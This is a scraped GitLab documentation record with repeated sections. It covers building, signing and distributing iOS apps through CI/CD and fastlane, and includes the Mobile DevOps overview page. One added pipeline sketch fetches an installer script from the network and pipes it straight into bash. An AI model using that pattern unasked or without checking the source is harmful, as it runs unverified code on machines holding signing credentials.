1. 
Provide the Apple App Store Connect configuration information: - **Issuer ID**: The Apple App Store Connect issuer ID. - **Key ID**: The key ID of the generated private key. - **Private key**: The generated private key. You can download this key only once. - **Protected branches and tags only**: Enable to set variables on protected branches and tags only. 1. Select **Save changes**. 1. Add the release step to your pipeline and fastlane configuration. The following is a sample `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for distribution, upload to TestFlight" lane :beta do setup_ci match(type: 'appstore', readonly: is_ci) app_store_connect_api_key increment_build_number( build_number: latest_testflight_build_number(initial_build_number: 1) + 1, xcodeproj: "ios demo.xcodeproj" ) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Release", export_method: "app-store" ) upload_to_testflight end end ``` The following is a sample `.gitlab-ci.yml`: ```yaml beta_ios: image: macos-12-xcode-14 stage: beta script: - fastlane beta ``` Congratulations! Your app is now set up for automated building, signing, and distribution. Try creating a merge request to trigger your first pipeline. ## Sample projects Sample Mobile DevOps projects with pipelines configured to build, sign, and release mobile apps are available for: - Android - Flutter - iOS View all projects in the [Mobile DevOps Demo Projects](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/) group.
--- stage: Verify group: Mobile DevOps info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: 'Tutorial: Build iOS apps with GitLab Mobile DevOps' breadcrumbs: - doc - ci - mobile_devops --- In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your iOS mobile app, signs it with your credentials, and distributes it to app stores. To set up mobile DevOps: 1. [Set up your build environment](#set-up-your-build-environment) 1. [Configure code signing with fastlane](#configure-code-signing-with-fastlane) 1. [Set up app distribution with Apple Store integration and fastlane](#set-up-app-distribution-with-apple-store-integration-and-fastlane) ## Before you begin Before you start this tutorial, make sure you have: - A GitLab account with access to CI/CD pipelines - Your mobile app code in a GitLab repository - An Apple Developer account - [`fastlane`](https://fastlane.tools) installed locally ## Set up your build environment Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. 1. Create a `.gitlab-ci.yml` file in your repository root. 1. Add a [supported macOS image](../runners/hosted_runners/macos.md#supported-macos-images) to run a job on a [macOS GitLab-hosted runner](../runners/hosted_runners/macos.md) (beta): ```yaml test: image: macos-14-xcode-15 stage: test script: - fastlane test tags: - saas-macos-medium-m1 ``` ## Configure code signing with fastlane To set up code signing for iOS, upload signed certificates to GitLab by using fastlane: 1. Initialize fastlane: ```shell fastlane init ``` 1. Generate a `Matchfile` with the configuration: ```shell fastlane match init ``` 1. 
Generate certificates and profiles in the Apple Developer portal and upload those files to GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match development ``` 1. Optional. If you have already created signing certificates and provisioning profiles for your project, use `fastlane match import` to load your existing files into GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match import ``` You are prompted to input the path to your files. After you provide those details, your files are uploaded and visible in your project's CI/CD settings. If prompted for the `git_url` during the import, it is safe to leave it blank and press <kbd>enter</kbd>. The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration: - `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for development" lane :build do setup_ci match(type: 'development', readonly: is_ci) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Debug", export_method: "development" ) end end ``` - `.gitlab-ci.yml`: ```yaml build_ios: image: macos-12-xcode-14 stage: build script: - fastlane build tags: - saas-macos-medium-m1 ``` ## Set up app distribution with Apple Store integration and fastlane Signed builds can be uploaded to the Apple App Store by using the Mobile DevOps Distribution integrations. Prerequisites: - You must have an Apple ID enrolled in the Apple Developer Program. - You must generate a new private key for your project in the Apple App Store Connect portal. To create an iOS distribution with the Apple Store integration and fastlane: 1. Generate an API Key for App Store Connect API. In the Apple App Store Connect portal, [generate a new private key for your project](https://developer.apple.com/documentation/appstoreconnectapi/creating_api_keys_for_app_store_connect_api). 1. Enable the Apple App Store Connect integration: 1. 
On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > Integrations**. 1. Select **Apple App Store Connect**. 1. Under **Enable integration**, select the **Active** checkbox. 1. Provide the Apple App Store Connect configuration information: - **Issuer ID**: The Apple App Store Connect issuer ID. - **Key ID**: The key ID of the generated private key. - **Private key**: The generated private key. You can download this key only once. - **Protected branches and tags only**: Enable to set variables on protected branches and tags only. 1. Select **Save changes**. 1. Add the release step to your pipeline and fastlane configuration. The following is a sample `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for distribution, upload to TestFlight" lane :beta do setup_ci match(type: 'appstore', readonly: is_ci) app_store_connect_api_key increment_build_number( build_number: latest_testflight_build_number(initial_build_number: 1) + 1, xcodeproj: "ios demo.xcodeproj" ) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Release", export_method: "app-store" ) upload_to_testflight end end ``` The following is a sample `.gitlab-ci.yml`: ```yaml beta_ios: image: macos-12-xcode-14 stage: beta script: - fastlane beta ``` Congratulations! Your app is now set up for automated building, signing, and distribution. Try creating a merge request to trigger your first pipeline. ## Sample projects Sample Mobile DevOps projects with pipelines configured to build, sign, and release mobile apps are available for: - Android - Flutter - iOS View all projects in the [Mobile DevOps Demo Projects](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/) group.
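As with the Android tutorial, the iOS jobs can be assembled into a single pipeline. The following `.gitlab-ci.yml` is a sketch under stated assumptions: it unifies the image on `macos-14-xcode-15` (the tutorial's later samples use `macos-12-xcode-14`), assumes the fastlane `test`, `build`, and `beta` lanes shown above, and the `rules` entry is an illustrative addition:

```yaml
# Sketch: combined iOS pipeline on macOS GitLab-hosted runners.
stages:
  - test
  - build
  - beta

default:
  image: macos-14-xcode-15
  tags:
    - saas-macos-medium-m1

test:
  stage: test
  script:
    - fastlane test

build_ios:
  stage: build
  script:
    - fastlane build

beta_ios:
  stage: beta
  script:
    - fastlane beta
  rules:
    # Assumption: only upload to TestFlight from the default branch.
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
```

The `default` section keeps the image and runner tags in one place so the three jobs stay consistent; override per job if, for example, only signing steps need a newer Xcode.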
https://docs.gitlab.com/ci/mobile_devops
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/mobile_devops
[ "doc", "ci", "mobile_devops" ]
_index.md
Verify
Mobile DevOps
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Mobile DevOps
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Build, sign, and release native and cross-platform mobile apps for Android and iOS by using GitLab CI/CD. GitLab Mobile DevOps provides tools and best practices to automate your mobile app development workflow. GitLab Mobile DevOps integrates key mobile development capabilities into the GitLab DevSecOps platform: - Build environments for iOS and Android development - Secure code signing and certificate management - App store distribution for Google Play and Apple App Store ## Build environments Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. ## Code signing All Android and iOS apps must be securely signed before being distributed through the various app stores. Signing ensures that applications haven't been tampered with before reaching a user's device. With [project-level secure files](../secure_files/_index.md), you can store the following in GitLab, so that they can be used to securely sign apps in CI/CD builds: - Keystores - Provisioning profiles - Signing certificates <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Project-level secure files demo](https://youtu.be/O7FbJu3H2YM). ## Distribution Signed builds can be uploaded to the Google Play Store or Apple App Store by using the Mobile DevOps Distribution integrations. ## Related topics For step-by-step guidance on implementing Mobile DevOps, see: - [Tutorial: Build Android apps with GitLab Mobile DevOps](mobile_devops_tutorial_android.md) - [Tutorial: Build iOS apps with GitLab Mobile DevOps](mobile_devops_tutorial_ios.md)
--- stage: Verify group: Mobile DevOps info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Mobile DevOps breadcrumbs: - doc - ci - mobile_devops --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Build, sign, and release native and cross-platform mobile apps for Android and iOS by using GitLab CI/CD. GitLab Mobile DevOps provides tools and best practices to automate your mobile app development workflow. GitLab Mobile DevOps integrates key mobile development capabilities into the GitLab DevSecOps platform: - Build environments for iOS and Android development - Secure code signing and certificate management - App store distribution for Google Play and Apple App Store ## Build environments Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. ## Code signing All Android and iOS apps must be securely signed before being distributed through the various app stores. Signing ensures that applications haven't been tampered with before reaching a user's device. With [project-level secure files](../secure_files/_index.md), you can store the following in GitLab, so that they can be used to securely sign apps in CI/CD builds: - Keystores - Provisioning profiles - Signing certificates <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Project-level secure files demo](https://youtu.be/O7FbJu3H2YM). ## Distribution Signed builds can be uploaded to the Google Play Store or Apple App Store by using the Mobile DevOps Distribution integrations. 
## Related topics For step-by-step guidance on implementing Mobile DevOps, see: - [Tutorial: Build Android apps with GitLab Mobile DevOps](mobile_devops_tutorial_android.md) - [Tutorial: Build iOS apps with GitLab Mobile DevOps](mobile_devops_tutorial_ios.md)
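The code signing section above relies on project-level secure files being available to CI/CD jobs. The following job is a sketch of how a pipeline might fetch them before a signing step; the installer URL is the one used in the Android tutorial, while the job name, stage, and listed file names are assumptions for illustration:

```yaml
# Sketch: make project-level secure files available to a signing job.
# The download-secure-files installer places files under .secure_files/.
sign:
  stage: build
  script:
    - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash
    # At this point keystores, provisioning profiles, and certificates
    # uploaded as secure files are on disk for the build tooling to use.
    - ls .secure_files
```

Because the files are fetched at job runtime rather than committed to the repository, signing material never enters version control.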